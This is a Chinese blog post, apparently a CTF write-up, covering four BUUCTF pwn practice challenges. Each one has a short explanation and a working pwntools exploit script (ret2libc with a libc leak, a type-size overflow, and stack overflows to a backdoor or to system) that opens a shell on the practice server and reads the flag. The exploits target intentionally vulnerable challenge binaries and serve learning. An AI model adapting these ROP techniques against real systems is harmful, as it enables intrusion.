PWN-PRACTICE-BUUCTF-3

最新推荐文章于 2024-05-06 17:11:26 发布
最新推荐文章于 2024-05-06 17:11:26 发布
阅读量133 收藏 1
点赞数
分类专栏: Pwn-BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/119040301
版权

PWN-PRACTICE-BUUCTF-3

[OGeek2019]babyrop

简单的ret2libc,构造rop
main函数中读取一个随机数到buf中,传入sub_804871F
用"\x00"来绕过strlen和strncmp,buf[7]作为返回值
rop-init
传入sub_804871F返回的buf[7]作为要读取的长度,设置为255,构成栈溢出
rop-leak
最后是ret2libc脚本,一开始用io.sendline()不行,它会自动加一个"\n",在将缓冲区填充满的情况下又加了一个"\n",导致打印不出write_addr,换成io.send()就可以了,它不会自动加"\n"

from pwn import *
#context.log_level="debug"
io=remote('node4.buuoj.cn',29571)
elf=ELF('./pwn')
libc=ELF('./libc-2.23-16-x32.so')
payload="\x00"+"a"*6+p8(255)+"b"*24
io.send(payload)
io.recvuntil('Correct\n')
write_got=elf.got['write']
write_plt=elf.plt['write']
main_addr=0x08048825
payload="a"*(231+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
io.send(payload)
write_addr=u32(io.recv(4))
print(hex(write_addr))
libc_base=write_addr-libc.sym['write']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search("/bin/sh").next()
payload="\x00"+"a"*6+p8(255)+"b"*24
io.send(payload)
io.recvuntil('Correct\n')
payload="a"*(231+4)+p32(system)+p32(0xdeadbeef)+p32(binsh)
io.send(payload)
io.sendline("cat flag")
io.interactive()

ciscn_2019_n_8

main函数中,验证var[13]==0x11是否成立
可以知道var中数组元素都是_DWORD类型的,即双字,四字节,32位
在第13行的if语句中,从var[13]的起始地址开始,读取了一个_QWORD类型的数字,即四字,八字节,64位
ciscn-main
于是可以构造输入为,前13个为32位的数字,后接一个64位的0x11,即可验证通过,执行系统调用

from pwn import *
#context.log_level="debug"
io=remote('node4.buuoj.cn',28433)
io.recvuntil("What's your name?\n")
payload=p32(0)*13+p64(0x11)
io.sendline(payload)
io.sendline("cat flag")
io.interactive()

get_started_3dsctf_2016

静态编译的elf
main函数中存在栈溢出,覆盖eip到后门函数get_flag
构造payload的时候,发现main函数是用esp寻址的,不用覆盖ebp,填充完缓冲区后直接覆盖eip
后面的返回地址不能随便填,找到一个exit函数,填exit的地址
最后再带上get_flag函数中要验证的两个参数

from pwn import *
#context.log_level="debug"
io=remote('node4.buuoj.cn',28168)
get_flag=0x080489A0
exit=0x0804E6A0
payload="a"*56+p32(get_flag)+p32(exit)+p32(0x308CD64F)+p32(0x195719D1)
io.sendline(payload)
io.interactive()

jarvisoj_level2

简单的栈溢出,ret2syscall
可执行文件留有system,还给了hint,即"/bin/sh"
利用栈溢出,覆盖eip到system,带上参数hint,即可getshell

from pwn import *
io=remote('node4.buuoj.cn',26226)
elf=ELF('./level2')
io.recvuntil("Input:\n")
hint=elf.sym['hint']
system=elf.plt['system']
main_addr=0x08048480
payload="a"*(136+4)+p32(system)+p32(main_addr)+p32(hint)
io.sendline(payload)
io.sendline("cat flag")
io.interactive()
P1umH0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
OGeek2019bayrop
m0_62322730的博客
05-06 354
OGeek2019bayrop
[OGeek2019]babyrop
m0sway的博客
03-22 1108
[OGeek2019]babyrop WriteUp BUU_PWN
[OGeek2019]babyrop[BUUCTF]
最新发布
moonlightsunshin的博客
05-06 361
首先我们要确保strncmp=0保证程序不退出,直接让v1=0strncmp就会为0strncmp用来获取长度当读到"\0"会自动赋0所以我们让buf[0]="\x00"没有/bin/sh和system加上题目这道题的思路就是利用write泄露出libc的地址来进行ROP。buf长度只需0xe7+4就可以溢出。32位开了NX,地址随机化基本排除shellcode的可能。write也是libc库中的标准函数。shift+f12看字符串。
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3578
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTFpwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 418
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
BUUCTF pwn——[OGeek2019]babyrop
CNS-Enterprise BCC-1701-J
04-02 237
BUUCTF 做题练习
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
pwn-200题目文件
02-16
pwn-200题目文件
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1220
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
ctf【[OGeek2019]babyrop】
HUANGliang_的博客
10-29 245
(1)用0x00绕过strncmp比较 (2)进入sub_80487D0函数进行第二次输入,因为buf有0xe7字节,因此0xc8是不够输入的,为使得多输入一些字符可以将a1写为0xff (3)泄漏read的got地址,求得偏移量,通过溢出执行write函数,打印出read的got地址,并在此之后重新执行sub_80487D0函数 (4)根据得到的read的got地址求偏移量,计算出system函数地址和"\bin\sh"的地址,实施漏洞攻击,夺取权限
Buuctf(pwn)[OGeek2019]babyrop
半岛铁盒的博客
03-25 664
发现第二个函数有个read函数,但它是0x20是不能够构成漏洞利用,只是利用它作为中间的一个简单的输出即可; 跳过if判定: 只需在第一次输入时 在最前面加上 ‘\0’ a1上上一次返回的 buf[7] 这里的漏洞点利用, 要保证 a1的值尽可能的大, 这里选择的是 ‘xff’ – 255 该题目已经为我们提供了Libc Exp可以这样写 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23....
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 489
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
buuctf13-17题
XDiku的博客
01-29 135
ok
攻防世界pwn-forgot
08-10
- *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值